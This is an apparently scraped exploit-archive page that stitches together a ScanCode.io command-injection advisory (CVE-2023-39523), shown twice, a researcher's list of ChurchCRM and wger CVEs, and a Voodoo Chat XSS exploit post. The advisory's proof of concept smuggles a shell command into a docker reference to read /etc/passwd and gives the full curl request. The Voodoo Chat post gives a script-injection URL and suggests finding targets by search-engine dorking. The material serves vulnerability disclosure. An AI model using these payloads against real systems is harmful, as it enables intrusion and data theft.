*   SUSE (1,444)
*   Ubuntu (8,803)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

eHato CMS 1.0 Cross Site Scripting

## Command Injection in docker fetch process

### Summary
A possible command injection in the docker fetch process as it allows to append malicious commands in the docker_reference parameter.


### Details
In the function `scanpipe/pipes/fetch.py:fetch_docker_image`[1] the parameter `docker_reference` is user controllable. The `docker_reference` variable is then passed to the vulnerable function `get_docker_image_platform`. 
```python
def fetch_docker_image(docker_reference, to=None):
    """
    code snipped ....
    """
    platform_args = []
    platform = get_docker_image_platform(docker_reference) # User controlled `docker_reference` passed
   """
   code snipped...
   """
```

However, the `get_docker_image_plaform` function constructs a shell command with the passed `docker_reference`. The `pipes.run_command` then executes the shell command without any prior sanitization, making the function vulnerable to command injections. 

```python
def get_docker_image_platform(docker_reference):
    """
    Return a platform mapping of a docker reference.
    If there are more than one, return the first one by default.
    """
    skopeo_executable = _get_skopeo_location()
    """
    Constructing a shell command with user controlled variable `docker_reference`
    """
    cmd = (
        f"{skopeo_executable} inspect --insecure-policy --raw --no-creds "
        f"{docker_reference}"
    )

    logger.info(f"Fetching image os/arch data: {cmd}")
    exitcode, output = pipes.run_command(cmd) # Executing command
    logger.info(output)
    if exitcode != 0:
        raise FetchDockerImageError(output)
``` 

A malicious user who is able to create or add inputs to a project can inject commands. Although the command injections are blind and the user will not receive direct feedback without logs, it is still possible to cause damage to the server/container. The vulnerability appears for example if a malicious user adds a semicolon after the input of `docker://;`, it would allow appending malicious commands.

### PoC

1. Create a new project with following input `docker://;echo${IFS}"PoC"${IFS}&&cat${IFS}/etc/passwd` in the filed Download URLs
![image](https://user-images.githubusercontent.com/122313513/258454691-7cabe100-f82d-44b9-99f2-5d6a0949e6c4.png)

2. Check docker logs to see the command execution
![image](https://user-images.githubusercontent.com/122313513/258455082-d7590b16-6fcb-4041-949f-2e20959db713.png)

```bash
curl -i -s -k -X $'POST' \
    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------2742275543734015476190112060' -H $'Content-Length: 923' -H $'Origin: http://localhost' -H $'DNT: 1' -H $'Connection: close' -H $'Referer: http://localhost/project/add/' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' \
    -b $'csrftoken=7H2chgA7jPHnXK0NNPftIoCW9z8SabKR' \
    --data-binary $'-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\"csrfmiddlewaretoken\"\x0d\x0a\x0d\x0ayslGuNnvWloFUEUCWI5VlMuZ60ZDDSkFvZdIBTNs50VSHeKfznaeT0WL5pXlDTUm\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\"name\"\x0d\x0a\x0d\x0apoc\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\"input_files\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\"input_urls\"\x0d\x0a\x0d\x0adocker://;echo${IFS}\"PoC\"${IFS}&&cat${IFS}/etc/passwd\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\"pipeline\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\"execute_now\"\x0d\x0a\x0d\x0aon\x0d\x0a-----------------------------2742275543734015476190112060--\x0d\x0a' \
    $'http://localhost/project/add/'
```

**Mitigations**
The `docker_reference` input should be sanitized to avoid command injections and it is not recommend to create commands with user controlled input directly. 


**Tested on:**
- Commit: Latest commit [bda3a70e0b8cd95433928db1fd4b23051bc7b7eb]
- OS: Ubuntu Linux Kernel 5.19.0

**References**
[1] https://github.com/nexB/scancode.io/blob/main/scanpipe/pipes/fetch.py#L185


**Command Injection in docker fetch process****Summary**

A possible command injection in the docker fetch process as it allows to append malicious commands in the docker\_reference parameter.

**Details**

In the function scanpipe/pipes/fetch.py:fetch_docker_image\[1\] the parameter docker_reference is user controllable. The docker_reference variable is then passed to the vulnerable function get_docker_image_platform.

def fetch\_docker\_image(docker\_reference, to\=None):
    """
    code snipped ....
    """
    platform\_args \= \[\]
    platform \= get\_docker\_image\_platform(docker\_reference) \# User controlled \`docker\_reference\` passed
   """
   code snipped...
   """

However, the get_docker_image_plaform function constructs a shell command with the passed docker_reference. The pipes.run_command then executes the shell command without any prior sanitization, making the function vulnerable to command injections.

def get\_docker\_image\_platform(docker\_reference):
    """
    Return a platform mapping of a docker reference.
    If there are more than one, return the first one by default.
    """
    skopeo\_executable \= \_get\_skopeo\_location()
    """
    Constructing a shell command with user controlled variable \`docker\_reference\`
    """
    cmd \= (
        f"{skopeo\_executable} inspect --insecure-policy --raw --no-creds "
        f"{docker\_reference}"
    )

    logger.info(f"Fetching image os/arch data: {cmd}")
    exitcode, output \= pipes.run\_command(cmd) \# Executing command
    logger.info(output)
    if exitcode != 0:
        raise FetchDockerImageError(output)

A malicious user who is able to create or add inputs to a project can inject commands. Although the command injections are blind and the user will not receive direct feedback without logs, it is still possible to cause damage to the server/container. The vulnerability appears for example if a malicious user adds a semicolon after the input of docker://;, it would allow appending malicious commands.

**PoC**

1.  Create a new project with following input docker://;echo${IFS}"PoC"${IFS}&&cat${IFS}/etc/passwd in the filed Download URLs  
    
2.  Check docker logs to see the command execution  
    

curl -i -s -k -X $'POST' \\
    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:109.0) Gecko/20100101 Firefox/110.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------2742275543734015476190112060' -H $'Content-Length: 923' -H $'Origin: http://localhost' -H $'DNT: 1' -H $'Connection: close' -H $'Referer: http://localhost/project/add/' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' \\
    -b $'csrftoken=7H2chgA7jPHnXK0NNPftIoCW9z8SabKR' \\
    --data-binary $'-----------------------------2742275543734015476190112060\\x0d\\x0aContent-Disposition: form-data; name=\\"csrfmiddlewaretoken\\"\\x0d\\x0a\\x0d\\x0ayslGuNnvWloFUEUCWI5VlMuZ60ZDDSkFvZdIBTNs50VSHeKfznaeT0WL5pXlDTUm\\x0d\\x0a-----------------------------2742275543734015476190112060\\x0d\\x0aContent-Disposition: form-data; name=\\"name\\"\\x0d\\x0a\\x0d\\x0apoc\\x0d\\x0a-----------------------------2742275543734015476190112060\\x0d\\x0aContent-Disposition: form-data; name=\\"input\_files\\"; filename=\\"\\"\\x0d\\x0aContent-Type: application/octet-stream\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a-----------------------------2742275543734015476190112060\\x0d\\x0aContent-Disposition: form-data; name=\\"input\_urls\\"\\x0d\\x0a\\x0d\\x0adocker://;echo${IFS}\\"PoC\\"${IFS}&&cat${IFS}/etc/passwd\\x0d\\x0a-----------------------------2742275543734015476190112060\\x0d\\x0aContent-Disposition: form-data; name=\\"pipeline\\"\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a-----------------------------2742275543734015476190112060\\x0d\\x0aContent-Disposition: form-data; name=\\"execute\_now\\"\\x0d\\x0a\\x0d\\x0aon\\x0d\\x0a-----------------------------2742275543734015476190112060--\\x0d\\x0a' \\
    $'http://localhost/project/add/'

**Mitigations**  
The docker_reference input should be sanitized to avoid command injections and it is not recommend to create commands with user controlled input directly.

**Tested on:**

*   Commit: Latest commit \[bda3a70e0b8cd95433928db1fd4b23051bc7b7eb\]
*   OS: Ubuntu Linux Kernel 5.19.0

**References**  
\[1\] https://github.com/nexB/scancode.io/blob/main/scanpipe/pipes/fetch.py#L185

**References**

*   GHSA-2ggp-cmvm-f62f
*   https://nvd.nist.gov/vuln/detail/CVE-2023-39523
*   nexB/scancode.io@07ec0de
*   https://github.com/nexB/scancode.io/blob/main/scanpipe/pipes/fetch.py#L185
*   https://github.com/nexB/scancode.io/releases/tag/v32.5.1

GHSA-2ggp-cmvm-f62f: ScanCode.io command injection in docker image fetch process

SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive information via the volopp1 and volopp2 parameters within the /QueryView.php.

**CVE-Disclosures**

Welcome to the CVE disclosures section of this repository! Here, you'll find a list of security vulnerabilities that I have discovered while working on Free Open Source Software (FOSS) applications.

**CVEs I Have Discovered**

Findings

Description

CVE-2023-38758

A stored cross-site scripting (XSS) vulnerability in wger Workout Manager v2.2.0a3 allows remote attackers to inject arbitrary web script or HTML via the license_author parameter of the /en/nutrition/ingredient/add/ endpoint.

CVE-2023-38759

A cross-site request forgery (CSRF) vulnerability in wger Workout Manager v2.2.0a3 allows remote attackers to gain privileges via email change and password reset functionality at /en/user/preferences, /en/gym/user/1/reset-user-password, and /en/user/password/reset/. These attack vectors can allow any account to be compromised, with resulting data exfiltrated back to the attacker's server.

CVE-2023-38760

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the role and gender parameters within the /QueryView.php?QueryID=7 endpoint (Person by Role and Gender query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38761

A cross site scripting (XSS) vulnerability in ChurchCRM v5.0.0 allows remote attackers to inject arbitrary web script or HTML via a crafted payload to the systemSettings.php endpoint. This payload is placed within the site header and is triggered whenever anyone authenticated views any page. This vulnerability can be used to execute arbitrary JavaScript code within the victim's session, perform information disclosure, or potentially perform other CSRF attacks.

CVE-2023-38762

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the friendmonths parameter within the /QueryView.php?QueryID=26 endpoint (Recent Friends query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38763

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows an authenticated remote attacker to obtain sensitive database information via the FundRaiserID parameter within the /FundRaiserEditor.php endpoint. This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38764

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the birthmonth and percls parameters within the /QueryView.php?QueryID=18 endpoint (Birthdays query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38765

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the membermonth parameter within the /QueryView.php?QueryID=22 endpoint (Membership Anniversaries query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38766

A cross site scripting (XSS) vulnerability in ChurchCRM v5.0.0 allows remote attackers to inject arbitrary web script or HTML via a crafted payload to the PersonView.php endpoint. An authenticated attacker can perform stored XSS by editing their user profile. This payload is triggered whenever anyone views this user's profile. This vulnerability can be used to execute arbitrary JavaScript code within the victim's session, perform information disclosure, or potentially perform other CSRF attacks.

CVE-2023-38767

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the value and custom parameters within the /QueryView.php?QueryID=200 endpoint (CustomSearch query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38768

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the PropertyID parameter within the /QueryView.php?QueryID=9 endpoint (Person by Property query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38769

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the searchstring and searchwhat parameters within the /QueryView.php?QueryID=15 endpoint (Advanced Search query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38770

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the group parameter within the /QueryView.php?QueryID=21 endpoint (Registered Students query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38771

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the volopp parameter within the /QueryView.php?QueryID=25 endpoint (Volunteers - 'for a particular opportunity' query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38773

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the volopp1 and volopp2 parameters within the /QueryView.php?QueryID=100 endpoint (Volunteers - 'who match two specific codes' query). This can be used for information disclosure of anything in the database, including user credentials.

_I will update this list as soon as new vulnerabilities are found and available for public disclosure._

CVE-2023-38773: GitHub - 0x72303074/CVE-Disclosures

Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

**Voodoo Chat 1.3 Cross Site Scripting**

Posted Aug 8, 2023

Authored by indoushka

Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 11f7a2efbdf14e9500b0a6e971a896bbac171caeed20cc661f2b4ad1b5c02e2e

Download | Favorite | View

**Voodoo Chat 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Voodoo Chat v1.3 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.swalif.net/softs/swalif30/softs258256/#post1850068                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0[+] http://127.0.0.1/groupsyriacom/chat/pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

Tag

#csrf